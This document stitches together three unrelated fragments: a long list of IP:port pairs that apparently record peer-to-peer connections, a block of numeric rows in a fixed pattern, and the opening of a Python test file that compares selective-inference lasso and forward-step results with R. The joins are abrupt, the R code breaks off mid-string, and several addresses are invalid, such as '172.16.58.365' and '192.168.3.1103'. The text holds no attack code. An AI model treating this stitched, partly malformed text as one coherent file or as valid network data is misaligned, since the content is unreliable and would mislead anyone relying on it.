('172.16.31.10:36161', '172.16.31.10:46065'),
('172.16.31.10:36161', '172.16.31.10:51413'),
('172.16.31.10:36161', '172.16.17.32:55020'),
('172.16.31.10:36161', '172.16.31.10:6883'),
('172.16.31.10:36161', '172.16.58.3:54427'),
('172.16.31.10:36161', '172.16.31.10:50109'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '172.16.58.3:12350'),
('172.16.17.32:37321', '172.16.31.10:51413'),
('172.16.17.32:37321', '192.168.127.12:10573'),
('172.16.17.32:37321', '192.168.3.11:43417'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '192.168.3.11:28113'),
('172.16.17.32:37321', '192.168.127.12:51413'),
('172.16.17.32:37321', '192.168.127.12:55120'),
('172.16.17.32:37321', '192.168.3.11:60395'),
('172.16.17.32:37321', '192.168.3.11:14072'),
('172.16.17.32:37321', '172.16.31.10:61425'),
('172.16.17.32:37321', '172.16.58.3:59081'),
('172.16.17.32:37321', '192.168.127.12:51413'),
('172.16.17.32:37321', '172.16.31.10:62270'),
('172.16.17.32:37321', '172.16.17.32:22585'),
('172.16.17.32:37321', '172.16.31.10:46013'),
('172.16.17.32:37321', '172.16.17.32:52594'),
('172.16.17.32:37321', '192.168.3.11:51413'),
('172.16.17.32:37321', '172.16.17.32:57664'),
('172.16.17.32:37321', '172.16.58.3:11179'),
('172.16.17.32:37321', '172.16.31.10:6889'),
('172.16.17.32:37321', '172.16.58.3:11775'),
('172.16.17.32:37321', '172.16.31.10:10042'),
('172.16.17.32:61633', '172.16.17.32:50321'),
('172.16.17.32:61633', '172.16.58.3:51413'),
('172.16.17.32:61633', '192.168.127.12:51413'),
('172.16.17.32:61633', '172.16.31.10:51413'),
('172.16.17.32:61633', '192.168.127.12:6881'),
('172.16.17.32:61633', '172.16.31.10:15765'),
('172.16.17.32:61633', '172.16.17.32:8999'),
('172.16.17.32:61633', '172.16.17.32:6889'),
('172.16.31.10:55625', '192.168.127.12:6887'),
('172.16.31.10:55625', '172.16.17.32:8999'),
('172.16.31.10:55625', '192.168.3.11:29492'),
('172.16.31.10:55625', '172.16.17.32:46837'),
('172.16.31.10:55625', '192.168.3.11:51413'),
('172.16.31.10:55625', '172.16.31.10:17559'),
('172.16.31.10:55625', '172.16.17.32:55130'),
('172.16.31.10:55625', '172.16.58.3:6882'),
('192.168.3.11:1733', '172.16.58.3:51413'),
('192.168.3.11:1733', '172.16.58.3:6881'),
('192.168.3.11:1733', '192.168.3.11:50062'),
('192.168.3.11:1733', '192.168.127.12:64386'),
('192.168.3.11:1733', '192.168.127.12:15890'),
('192.168.3.11:1733', '192.168.127.12:50321'),
('192.168.3.11:1733', '172.16.31.10:58716'),
('192.168.3.11:64907', '172.16.58.3:51413'),
('192.168.3.11:64907', '192.168.3.11:6881'),
('192.168.3.11:64907', '172.16.31.10:51417'),
('192.168.3.11:64907', '172.16.31.10:6881'),
('192.168.3.11:64907', '172.16.17.32:6881'),
('192.168.3.11:64907', '192.168.3.11:35681'),
('192.168.3.11:64907', '192.168.127.12:16615'),
('192.168.3.11:64907', '172.16.31.10:50118'),
('172.16.31.10:9089', '192.168.127.12:51413'),
('172.16.31.10:9089', '172.16.58.3:23616'),
('172.16.31.10:9089', '172.16.17.32:51413'),
('172.16.31.10:9089', '172.16.58.3:14962'),
('172.16.31.10:9089', '172.16.17.32:11505'),
('172.16.31.10:9089', '172.16.31.10:6889'),
('172.16.31.10:9089', '172.16.17.32:41944'),
('172.16.31.10:9089', '172.16.58.3:1167'),
('172.16.31.10:9089', '172.16.58.3:30095'),
('172.16.31.10:9089', '172.16.31.10:51416'),
('172.16.31.10:9089', '172.16.17.32:11841'),
('172.16.31.10:9089', '192.168.3.11:50321'),
('172.16.31.10:9089', '172.16.31.10:27906'),
('172.16.31.10:9089', '172.16.58.3:6983'),
('172.16.31.10:9089', '192.168.3.11:54822'),
('172.16.31.10:9089', '172.16.17.32:51413'),
('172.16.31.10:9089', '192.168.127.12:50321'),
('172.16.31.10:9089', '192.168.127.12:50321'),
('172.16.31.10:9089', '192.168.127.12:51413'),
('172.16.31.10:9089', '192.168.127.12:1156'),
('172.16.31.10:9089', '172.16.58.3:50931'),
('172.16.31.10:9089', '192.168.3.11:6881'),
('172.16.31.10:9089', '172.16.31.10:54393'),
('172.16.31.10:9089', '172.16.17.32:54283'),
('192.168.3.11:19183', '172.16.17.32:6881'),
('192.168.3.11:19183', '172.16.31.10:51437'),
('192.168.3.11:19183', '172.16.17.32:63812'),
('192.168.3.11:19183', '172.16.31.10:28062'),
('192.168.3.11:19183', '192.168.3.11:30901'),
('192.168.3.11:19183', '192.168.127.12:37933'),
('192.168.3.11:19183', '192.168.127.12:10821'),
('192.168.3.11:19183', '172.16.17.32:6889'),
('172.16.17.32:48593', '172.16.58.3:30794'),
('172.16.17.32:48593', '172.16.58.3:60965'),
('172.16.17.32:48593', '192.168.3.11:55199'),
('172.16.17.32:48593', '172.16.58.3:19028'),
('172.16.17.32:48593', '192.168.3.11:4264'),
('172.16.17.32:48593', '172.16.17.32:60958'),
('172.16.17.32:48593', '172.16.31.10:52733'),
('172.16.17.32:48593', '192.168.3.11:39517'),
('172.16.58.3:6881', '172.16.58.3:40684'),
('172.16.58.3:6881', '172.16.58.365:51413'),
('172.16.58.3:6881', '192.168.127.12:59989'),
('172.16.58.3:6881', '172.16.17.32:51413'),
('172.16.58.3:6881', '172.16.58.3:51415'),
('172.16.58.3:6881', '172.16.31.10:41506'),
('172.16.58.3:6881', '172.16.17.32:46369'),
('172.16.58.3:6881', '192.168.3.11:36583'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '172.16.31.10:51413'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '172.16.58.3:6881'),
('172.16.17.32:51413', '192.168.127.12:60912'),
('172.16.17.32:51413', '172.16.58.3:51413'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '172.16.31.10:51437'),
('172.16.17.32:51413', '192.168.127.12:56272'),
('172.16.17.32:51413', '172.16.31.10:63914'),
('172.16.17.32:51413', '192.168.3.11:51413'),
('172.16.17.32:51413', '172.16.17.32:6881'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '192.168.127.12:64427'),
('172.16.17.32:51413', '172.16.58.3:12902'),
('172.16.17.32:51413', '192.168.127.12:53405'),
('172.16.17.32:51413', '172.16.58.3:41821'),
('172.16.17.32:51413', '172.16.31.10:62867'),
('172.16.17.32:51413', '172.16.17.32:18344'),
('172.16.17.32:51413', '192.168.3.11:28395'),
('172.16.17.32:51413', '172.16.31.10:6881'),
('172.16.17.32:51413', '172.16.17.32:12567'),
('172.16.17.32:51413', '172.16.17.32:51413'),
('172.16.17.32:51413', '192.168.127.12:6881'),
('172.16.17.32:51413', '192.168.3.11:56789'),
('172.16.17.32:51413', '192.168.127.12:8999'),
('172.16.17.32:51413', '172.16.58.3:63229'),
('172.16.17.32:51413', '172.16.31.10:38589'),
('172.16.17.32:51413', '172.16.58.3:8999'),
('172.16.17.32:51413', '172.16.31.10:41537'),
('172.16.17.32:23428', '192.168.127.12:61937'),
('172.16.17.32:23428', '192.168.127.12:51413'),
('172.16.17.32:23428', '192.168.3.11:52166'),
('172.16.17.32:23428', '172.16.31.10:61425'),
('172.16.17.32:23428', '192.168.127.12:51413'),
('172.16.17.32:23428', '172.16.31.10:44426'),
('172.16.17.32:23428', '192.168.127.12:54240'),
('172.16.17.32:23428', '172.16.31.10:38905'),
('192.168.3.11:56808', '192.168.3.11:6881'),
('192.168.3.11:56808', '192.168.3.11:22807'),
('192.168.3.11:56808', '192.168.127.12:8999'),
('192.168.3.11:56808', '192.168.127.12:51413'),
('192.168.3.11:56808', '172.16.31.10:6881'),
('192.168.3.11:56808', '192.168.127.12:6889'),
('192.168.3.11:56808', '172.16.58.3:6881'),
('192.168.3.11:56808', '172.16.58.3:50500'),
('172.16.31.10:48381', '172.16.17.32:10721'),
('172.16.31.10:48381', '172.16.31.10:33249'),
('172.16.31.10:48381', '172.16.58.3:21073'),
('172.16.31.10:48381', '192.168.3.11:32705'),
('172.16.31.10:48381', '172.16.17.32:7111'),
('172.16.31.10:48381', '172.16.17.32:36693'),
('172.16.31.10:48381', '192.168.127.12:9497'),
('172.16.31.10:48381', '172.16.31.10:10819'),
('172.16.31.10:48381', '192.168.3.11:50321'),
('172.16.31.10:48381', '172.16.17.32:6881'),
('172.16.31.10:48381', '192.168.3.11:36159'),
('172.16.31.10:48381', '172.16.31.10:23517'),
('172.16.31.10:48381', '172.16.58.3:11272'),
('172.16.31.10:48381', '192.168.127.12:50321'),
('172.16.31.10:48381', '192.168.3.11:6881'),
('172.16.31.10:48381', '192.168.3.11:3826'),
('172.16.58.3:41039', '172.16.17.32:54727'),
('172.16.58.3:41039', '172.16.58.3:8999'),
('172.16.58.3:41039', '172.16.17.32:46126'),
('172.16.58.3:41039', '192.168.3.11:20299'),
('172.16.58.3:41039', '172.16.17.32:49001'),
('172.16.58.3:41039', '172.16.58.3:50931'),
('172.16.58.3:41039', '192.168.127.12:17995'),
('172.16.58.3:41039', '192.168.127.12:3336'),
('172.16.17.32:6889', '172.16.17.32:49001'),
('172.16.17.32:6889', '172.16.17.32:25120'),
('172.16.17.32:6889', '172.16.17.32:3237'),
('172.16.17.32:6889', '192.168.127.12:8999'),
('172.16.17.32:6889', '172.16.58.3:46903'),
('172.16.17.32:6889', '192.168.127.12:8999'),
('172.16.17.32:6889', '172.16.58.3:53884'),
('172.16.17.32:6889', '192.168.127.12:49001'),
('192.168.3.11:6881', '172.16.31.10:35348'),
('192.168.3.11:6881', '172.16.58.3:11850'),
('192.168.3.11:6881', '192.168.127.12:6881'),
('192.168.3.11:6881', '172.16.17.32:8999'),
('192.168.3.11:6881', '172.16.17.32:60819'),
('192.168.3.11:6881', '192.168.3.11:13599'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.31.10:48259'),
('192.168.3.11:33560', '172.16.17.32:51415'),
('192.168.3.11:33560', '192.168.3.11:50321'),
('192.168.3.11:33560', '172.16.58.3:6881'),
('192.168.3.11:33560', '172.16.31.10:46936'),
('192.168.3.11:33560', '192.168.127.12:51440'),
('192.168.3.11:33560', '192.168.3.11:6881'),
('192.168.3.11:33560', '192.168.127.12:6881'),
('192.168.3.11:33560', '172.16.31.10:16819'),
('172.16.58.3:64615', '172.16.58.3:9378'),
('172.16.58.3:64615', '172.16.31.10:53118'),
('172.16.58.3:64615', '172.16.31.10:51509'),
('172.16.58.3:64615', '172.16.31.10:6943'),
('172.16.58.3:64615', '192.168.127.12:31939'),
('172.16.58.3:64615', '192.168.127.12:31364'),
('172.16.58.3:64615', '172.16.58.3:38260'),
('172.16.58.3:64615', '192.168.3.11:6881'),
('172.16.17.32:13531', '192.168.3.11:37332'),
('172.16.17.32:13531', '172.16.58.3:54318'),
('172.16.17.32:13531', '192.168.127.12:51413'),
('172.16.17.32:13531', '172.16.58.3:55131'),
('172.16.17.32:13531', '192.168.3.11:57924'),
('172.16.17.32:13531', '172.16.31.10:23290'),
('172.16.17.32:13531', '172.16.31.10:19857'),
('172.16.58.36:13531', '172.16.17.32:1051'),
('192.168.3.11:51413', '172.16.31.10:51413'),
('192.168.3.11:51413', '192.168.127.12:21415'),
('192.168.3.11:51413', '192.168.3.11:1046'),
('192.168.3.11:51413', '172.16.17.32:3074'),
('192.168.3.11:51413', '192.168.127.12:50321'),
('192.168.3.11:51413', '172.16.31.10:50321'),
('192.168.3.11:51413', '172.16.31.10:47505'),
('192.168.3.11:51413', '172.16.31.10:26865'),
('192.168.127.12:6881', '172.16.17.32:6889'),
('192.168.127.12:6881', '192.168.127.12:21753'),
('192.168.127.12:6881', '192.168.127.12:50047'),
('192.168.127.12:6881', '172.16.58.3:32697'),
('192.168.127.12:6881', '172.16.17.32:51486'),
('192.168.127.12:6881', '172.16.31.10:53374'),
('192.168.127.12:6881', '172.16.58.3:57935'),
('192.168.127.12:6881', '192.168.127.12:64327'),
('172.16.31.10:59518', '172.16.58.3:3931'),
('172.16.31.10:59518', '192.168.127.12:6339'),
('172.16.31.10:59518', '172.16.31.10:47001'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '192.168.3.11:54851'),
('172.16.31.10:59518', '192.168.3.11:35286'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '172.16.31.10:5852'),
('172.16.31.10:59518', '172.16.58.3:28016'),
('172.16.31.10:59518', '192.168.127.12:32216'),
('172.16.31.10:59518', '172.16.17.32:54394'),
('172.16.31.10:59518', '172.16.31.10:51413'),
('172.16.31.10:59518', '172.16.17.32:51413'),
('172.16.31.10:59518', '172.16.31.10:61425'),
('172.16.31.10:59518', '192.168.3.11:6889'),
('172.16.31.10:59518', '192.168.127.12:55011'),
('172.16.31.10:59518', '192.168.127.12:26503'),
('172.16.31.10:59518', '192.168.127.12:6889'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('172.16.31.10:59518', '172.16.58.3:43891'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('172.16.31.10:59518', '172.16.58.3:49200'),
('172.16.31.10:59518', '192.168.3.11:55366'),
('172.16.31.10:59518', '172.16.17.32:11051'),
('172.16.31.10:59518', '192.168.3.11:31240'),
('172.16.31.10:59518', '172.16.31.10:8999'),
('172.16.31.10:59518', '172.16.58.3:51413'),
('172.16.31.10:59518', '192.168.3.11:63537'),
('172.16.31.10:59518', '172.16.58.3:12318'),
('172.16.31.10:59518', '172.16.17.32:3123'),
('172.16.31.10:59518', '192.168.3.11:51413'),
('192.168.127.12:43026', '172.16.17.32:51413'),
('192.168.127.12:43026', '172.16.58.3:48000'),
('192.168.127.12:43026', '172.16.31.10:8102'),
('192.168.127.12:43026', '172.16.58.3:21607'),
('192.168.127.12:43026', '192.168.127.12:51413'),
('192.168.127.12:43026', '192.168.3.11:6881'),
('192.168.127.12:43026', '172.16.17.32:49834'),
('192.168.127.12:43026', '192.168.127.12:62348'),
('172.16.31.10:6881', '172.16.31.10:28034'),
('172.16.31.10:6881', '172.16.31.10:28141'),
('172.16.31.10:6881', '172.16.31.10:5947'),
('172.16.31.10:6881', '192.168.127.12:55883'),
('172.16.31.10:6881', '172.16.58.3:51413'),
('172.16.31.10:6881', '172.16.31.10:61425'),
('172.16.31.10:6881', '172.16.17.32:8999'),
('172.16.31.10:6881', '172.16.31.10:54981'),
('172.16.31.10:6881', '192.168.3.11:61270'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '192.168.127.12:55393'),
('172.16.31.10:6881', '172.16.58.3:42554'),
('172.16.31.10:6881', '192.168.127.12:60171'),
('172.16.31.10:6881', '172.16.58.3:45591'),
('172.16.31.10:23323', '172.16.58.3:6889'),
('172.16.31.10:23323', '172.16.31.10:40807'),
('172.16.31.10:23323', '192.168.127.12:6881'),
('172.16.31.10:23323', '172.16.31.10:6977'),
('172.16.31.10:23323', '192.168.127.12:51413'),
('172.16.31.10:23323', '172.16.31.10:34532'),
('172.16.31.10:23323', '172.16.17.32:56530'),
('172.16.31.10:23323', '172.16.58.3:28103'),
('172.16.31.10:23323', '192.168.127.12:30619'),
('172.16.31.10:23323', '192.168.3.11:6881'),
('172.16.31.10:23323', '172.16.17.32:47521'),
('172.16.31.10:23323', '192.168.127.12:51477'),
('172.16.31.10:23323', '172.16.31.10:12258'),
('172.16.31.10:23323', '172.16.58.3:6881'),
('172.16.31.10:23323', '192.168.127.12:40768'),
('172.16.31.10:23323', '172.16.17.32:44204'),
('172.16.31.10:23323', '192.168.127.12:51413'),
('172.16.31.10:23323', '192.168.127.12:6881'),
('172.16.31.10:23323', '172.16.31.10:48569'),
('172.16.31.10:23323', '172.16.31.10:6942'),
('172.16.31.10:23323', '172.16.31.10:44634'),
('172.16.31.10:23323', '192.168.127.12:31369'),
('172.16.31.10:23323', '192.168.127.12:51500'),
('172.16.31.10:23323', '172.16.58.3:6881'),
('172.16.31.10:23323', '192.168.3.1103:55131'),
('172.16.31.10:23323', '172.16.58.3:37893'),
('172.16.31.10:23323', '172.16.58.3:52556'),
('172.16.31.10:23323', '192.168.127.12:54890'),
('172.16.31.10:23323', '172.16.17.32:62323'),
('172.16.31.10:23323', '192.168.3.11:6881'),
('172.16.31.10:23323', '172.16.58.3:51413'),
('172.16.31.10:23323', '172.16.17.32:50321'),
('172.16.31.10:36801', '172.16.58.3:56529'),
('172.16.31.10:36801', '172.16.31.10:60668'),
('172.16.31.10:36801', '172.16.17.32:53757'),
('172.16.31.10:36801', '192.168.3.11:37099'),
('172.16.31.10:36801', '172.16.31.10:59731'),
('172.16.31.10:36801', '172.16.58.3:36470'),
('172.16.31.10:36801', '192.168.127.12:6881'),
('172.16.31.10:36801', '172.16.17.32:34062'),
('192.168.127.12:51413', '192.168.127.12:34067'),
('192.168.127.12:51413', '192.168.3.11:49001'),
('192.168.127.12:51413', '172.16.17.32:33596'),
('192.168.127.12:51413', '192.168.3.11:26149'),
('192.168.127.12:51413', '192.168.3.11:30492'),
('192.168.127.12:51413', '192.168.127.12:51413'),
('192.168.127.12:51413', '172.16.31.10:6881'),
('192.168.127.12:51413', '172.16.58.3:55353'),
('192.168.3.11:6881', '172.16.31.10:51725'),
('192.168.3.11:6881', '172.16.58.3:62120'),
('192.168.3.11:6881', '172.16.58.3:29452'),
('192.168.3.11:6881', '172.16.58.3:15006'),
('192.168.3.11:6881', '172.16.31.10:35516'),
('192.168.3.11:6881', '192.168.3.11:6481'),
('192.168.3.11:6881', '192.168.127.12:6881'),
('192.168.3.11:6881', '192.168.127.12:21213'),
('172.16.17.32:1112', '172.16.58.3:14660'),
('172.16.17.32:1112', '192.168.3.11:28886'),
('172.16.17.32:1112', '172.16.31.10:51138'),
('172.16.17.32:1112', '172.16.17.32:51415'),
('172.16.17.32:1112', '172.16.58.3:11900'),
('172.16.17.32:1112', '172.16.58.3:51413'),
('172.16.17.32:1112', '172.16.58.3:49869'),
('172.16.17.32:1112', '192.168.3.11:51413'),
('172.16.17.32:1112', '172.16.31.10:45396'),
('172.16.17.32:1112', '172.16.31.10:64367'),
('172.16.17.32:1112', '172.16.17.32:6881'),
('172.16.17.32:1112', '172.16.58.3:16921'),
('172.16.17.32:1112', '172.16.58.3:24505'),
('172.16.17.32:1112', '172.16.31.10:60027'),
('172.16.17.32:1112', '192.168.3.11:6881'),
('172.16.17.32:1112', '192.168.127.12:49165'),
('172.16.17.32:34443', '172.16.31.10:26211'),
('172.16.17.32:34443', '172.16.31.10:30814'),
('172.16.17.32:34443', '192.168.3.11:6989'),
('172.16.17.32:34443', '172.16.58.3:56912'),
('172.16.17.32:34443', '172.16.17.32:51411'),
('172.16.17.32:34443', '192.168.3.11:6881'),
('172.16.17.32:34443', '172.16.31.10:6881'),
('172.16.17.32:34443', '172.16.17.32:6881'),
('192.168.3.11:1043', '172.16.17.32:40976'),
('192.168.3.11:1043', '172.16.58.3:6881'),
('192.168.3.11:1043', '172.16.58.3:56170'),
('192.168.3.11:1043', '172.16.31.10:51413'),
('192.168.3.11:1043', '172.16.17.32:3074'),
('192.168.3.11:1043', '192.168.3.11:62219'),
('192.168.3.11:1043', '192.168.3.11:51413'),
('192.168.3.11:1043', '172.16.17.32:41241'),
('192.168.3.11:50321', '172.16.17.32:4551'),
('192.168.3.11:50321', '192.168.3.11:35526'),
('192.168.3.11:50321', '172.16.17.32:43057'),
('192.168.3.11:50321', '172.16.17.32:6881'),
('192.168.3.11:50321', '172.16.31.10:22624'),
('192.168.3.11:50321', '172.16.31.10:15765'),
('192.168.3.11:50321', '192.168.3.11:25852'),
('192.168.3.11:50321', '172.16.58.3:11917'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.17.32:59431'),
('172.16.31.10:6881', '192.168.3.11:58111'),
('172.16.31.10:6881', '192.168.127.12:55240'),
('172.16.31.10:6881', | |
481 1 0 163
1 482 1 0 162
1 483 1 0 161
1 485 1 0 159
1 486 1 0 158
1 488 1 0 156
1 489 1 0 155
1 491 1 0 321
1 492 1 0 320
1 494 1 0 318
1 495 1 0 317
1 497 1 0 315
1 498 1 0 314
1 499 1 0 313
1 500 1 0 312
1 501 1 0 311
1 502 1 0 310
1 504 1 0 308
1 505 1 0 307
1 506 1 0 306
1 507 1 0 305
1 508 1 0 304
1 509 1 0 303
1 511 1 0 301
1 512 1 0 300
1 513 1 0 299
1 514 1 0 298
1 515 1 0 297
1 516 1 0 296
1 518 1 0 294
1 519 1 0 293
1 521 1 0 291
1 522 1 0 290
1 459 1 0 186
1 462 1 0 183
1 465 1 0 180
1 466 1 0 179
1 467 1 0 178
1 468 1 0 177
1 469 1 0 176
1 472 1 0 173
1 473 1 0 172
1 474 1 0 171
1 475 1 0 170
1 476 1 0 169
1 479 1 0 166
1 480 1 0 165
1 481 1 0 164
1 482 1 0 163
1 483 1 0 162
1 486 1 0 159
1 489 1 0 156
1 492 1 0 321
1 495 1 0 318
1 498 1 0 315
1 499 1 0 314
1 500 1 0 313
1 501 1 0 312
1 502 1 0 311
1 505 1 0 308
1 506 1 0 307
1 507 1 0 306
1 508 1 0 305
1 509 1 0 304
1 512 1 0 301
1 513 1 0 300
1 514 1 0 299
1 515 1 0 298
1 516 1 0 297
1 519 1 0 294
1 522 1 0 291
1 457 1 0 153
1 458 1 0 152
1 459 1 0 151
1 460 1 0 150
1 461 1 0 149
1 462 1 0 148
1 463 1 0 147
1 464 1 0 146
1 465 1 0 145
1 466 1 0 144
1 467 1 0 143
1 468 1 0 142
1 469 1 0 141
1 470 1 0 140
1 471 1 0 139
1 472 1 0 138
1 473 1 0 137
1 474 1 0 136
1 475 1 0 135
1 476 1 0 134
1 477 1 0 133
1 478 1 0 132
1 479 1 0 131
1 480 1 0 130
1 481 1 0 129
1 482 1 0 128
1 483 1 0 127
1 484 1 0 126
1 485 1 0 125
1 486 1 0 124
1 487 1 0 123
1 488 1 0 122
1 489 1 0 121
1 490 1 0 288
1 491 1 0 287
1 492 1 0 286
1 493 1 0 285
1 494 1 0 284
1 495 1 0 283
1 496 1 0 282
1 497 1 0 281
1 498 1 0 280
1 499 1 0 279
1 500 1 0 278
1 501 1 0 277
1 502 1 0 276
1 503 1 0 275
1 504 1 0 274
1 505 1 0 273
1 506 1 0 272
1 507 1 0 271
1 508 1 0 270
1 509 1 0 269
1 510 1 0 268
1 511 1 0 267
1 512 1 0 266
1 513 1 0 265
1 514 1 0 264
1 515 1 0 263
1 516 1 0 262
1 517 1 0 261
1 518 1 0 260
1 519 1 0 259
1 520 1 0 258
1 521 1 0 257
1 522 1 0 256
1 457 1 0 152
1 458 1 0 151
1 460 1 0 149
1 461 1 0 148
1 463 1 0 146
1 464 1 0 145
1 465 1 0 144
1 466 1 0 143
1 467 1 0 142
1 468 1 0 141
1 470 1 0 139
1 471 1 0 138
1 472 1 0 137
1 473 1 0 136
1 474 1 0 135
1 475 1 0 134
1 477 1 0 132
1 478 1 0 131
1 479 1 0 130
1 480 1 0 129
1 481 1 0 128
1 482 1 0 127
1 484 1 0 125
1 485 1 0 124
1 487 1 0 122
1 488 1 0 121
1 490 1 0 287
1 491 1 0 286
1 493 1 0 284
1 494 1 0 283
1 496 1 0 281
1 497 1 0 280
1 498 1 0 279
1 499 1 0 278
1 500 1 0 277
1 501 1 0 276
1 503 1 0 274
1 504 1 0 273
1 505 1 0 272
1 506 1 0 271
1 507 1 0 270
1 508 1 0 269
1 510 1 0 267
1 511 1 0 266
1 512 1 0 265
1 513 1 0 264
1 514 1 0 263
1 515 1 0 262
1 517 1 0 260
1 518 1 0 259
1 520 1 0 257
1 521 1 0 256
1 457 1 0 151
1 460 1 0 148
1 463 1 0 145
1 464 1 0 144
1 465 1 0 143
1 466 1 0 142
1 467 1 0 141
1 470 1 0 138
1 471 1 0 137
1 472 1 0 136
1 473 1 0 135
1 474 1 0 134
1 477 1 0 131
1 478 1 0 130
1 479 1 0 129
1 480 1 0 128
1 481 1 0 127
1 484 1 0 124
1 487 1 0 121
1 490 1 0 286
1 493 1 0 283
1 496 1 0 280
1 497 1 0 279
1 498 1 0 278
1 499 1 0 277
1 500 1 0 276
1 503 1 0 273
1 504 1 0 272
1 505 1 0 271
1 506 1 0 270
1 507 1 0 269
1 510 1 0 266
1 511 1 0 265
1 512 1 0 264
1 513 1 0 263
1 514 1 0 262
1 517 1 0 259
1 520 1 0 256
1 457 1 0 120
1 458 1 0 119
1 459 1 0 118
1 460 1 0 117
1 461 1 0 116
1 462 1 0 115
1 463 1 0 114
1 464 1 0 113
1 465 1 0 112
1 466 1 0 111
1 467 1 0 110
1 468 1 0 109
1 469 1 0 108
1 470 1 0 107
1 471 1 0 106
1 472 1 0 105
1 473 1 0 104
1 474 1 0 103
1 475 1 0 102
1 476 1 0 101
1 477 1 0 100
1 478 1 0 99
1 479 1 0 98
1 480 1 0 97
1 481 1 0 96
1 482 1 0 95
1 483 1 0 94
1 484 1 0 93
1 485 1 0 92
1 486 1 0 91
1 487 1 0 90
1 488 1 0 89
1 489 1 0 88
1 490 1 0 255
1 491 1 0 254
1 492 1 0 253
1 493 1 0 252
1 494 1 0 251
1 495 1 0 250
1 496 1 0 249
1 497 1 0 248
1 498 1 0 247
1 499 1 0 246
1 500 1 0 245
1 501 1 0 244
1 502 1 0 243
1 503 1 0 242
1 504 1 0 241
1 505 1 0 240
1 506 1 0 239
1 507 1 0 238
1 508 1 0 237
1 509 1 0 236
1 510 1 0 235
1 511 1 0 234
1 512 1 0 233
1 513 1 0 232
1 514 1 0 231
1 515 1 0 230
1 516 1 0 229
1 517 1 0 228
1 518 1 0 227
1 519 1 0 226
1 520 1 0 225
1 521 1 0 224
1 522 1 0 223
1 457 1 0 117
1 458 1 0 116
1 459 1 0 115
1 470 1 0 114
1 471 1 0 113
1 472 1 0 112
1 473 1 0 111
1 474 1 0 110
1 475 1 0 109
1 476 1 0 108
1 477 1 0 107
1 478 1 0 106
1 479 1 0 105
1 480 1 0 104
1 481 1 0 103
1 482 1 0 102
1 483 1 0 101
1 460 1 0 98
1 461 1 0 97
1 462 1 0 96
1 465 1 0 93
1 466 1 0 92
1 467 1 0 91
1 484 1 0 90
1 485 1 0 89
1 486 1 0 88
1 490 1 0 252
1 | |
<reponame>kevinbfry/selective-inference
from __future__ import print_function
import numpy as np, pandas as pd
import regreg.api as rr
import nose.tools as nt
from numpy.testing import dec
try:
import rpy2.robjects as rpy
rpy2_available = True
import rpy2.robjects.numpy2ri as numpy2ri
except ImportError:
rpy2_available = False
try:
import statsmodels.api as sm
statsmodels_available = True
except ImportError:
statsmodels_available = False
from ..lasso import lasso, ROSI
from ..forward_step import forward_step
from ...randomized.lasso import lasso as rlasso, selected_targets, full_targets, debiased_targets
from ...tests.instance import gaussian_instance, logistic_instance
@dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_fixed_lambda():
"""
Check that Gaussian LASSO results agree with R
"""
tol = 1.e-5
for s in [1,1.1]:
lam = 7.8
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = %f
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,-2,rep(0,p-2))
y = x%%*%%beta + sigma*rnorm(n)
# first run glmnet
gfit = glmnet(x,y,standardize=FALSE)
# extract coef for a given lambda; note the 1/n factor!
# (and we don't save the intercept term)
lam = %f
beta_hat = coef(gfit, s=lam/n, exact=TRUE, x=x, y=y)
beta_hat = beta_hat[-1]
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,y,beta_hat,lam,sigma=sigma)
vlo = out$vlo
vup = out$vup
sdvar = out$sd
pval=out$pv
coef0=out$coef0
vars=out$vars
print(coef(lm(y ~ x[,out$vars])))
out
""" % (s, lam)
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars'))
coef = np.asarray(rpy.r('coef0')).reshape(-1)
sdvar = np.asarray(rpy.r('sdvar'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('as.numeric(beta_hat)'))
x = np.asarray(rpy.r('x'))
x = np.hstack([np.ones((x.shape[0], 1)), x])
y = y.reshape(-1)
#y -= y.mean()
L = lasso.gaussian(x, y, lam, sigma=s)
L.fit(solve_args={'min_its':200})
S = L.summary('onesided')
yield np.testing.assert_allclose, L.fit()[1:], beta_hat, 1.e-2, 1.e-2, False, 'fixed lambda, sigma=%f coef' % s
yield np.testing.assert_equal, L.active, selected_vars
yield np.testing.assert_allclose, S['pvalue'], R_pvals, tol, tol, False, 'fixed lambda, sigma=%f pval' % s
yield np.testing.assert_allclose, S['sd'], sdvar, tol, tol, False, 'fixed lambda, sigma=%f sd ' % s
yield np.testing.assert_allclose, S['onestep'], coef, tol, tol, False, 'fixed lambda, sigma=%f estimator' % s
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_forward_step():
"""
Check that forward step results agree with R
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(33)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
beta = c(3,2,rep(0,p-2))
y = x%*%beta + sigma*rnorm(n)
# run forward stepwise
fsfit = fs(x,y)
beta_hat = fsfit$beta
# compute sequential p-values and confidence intervals
out.seq = fsInf(fsfit,sigma=sigma)
vars = out.seq$vars
pval = out.seq$pv
vlo = out.seq$vlo
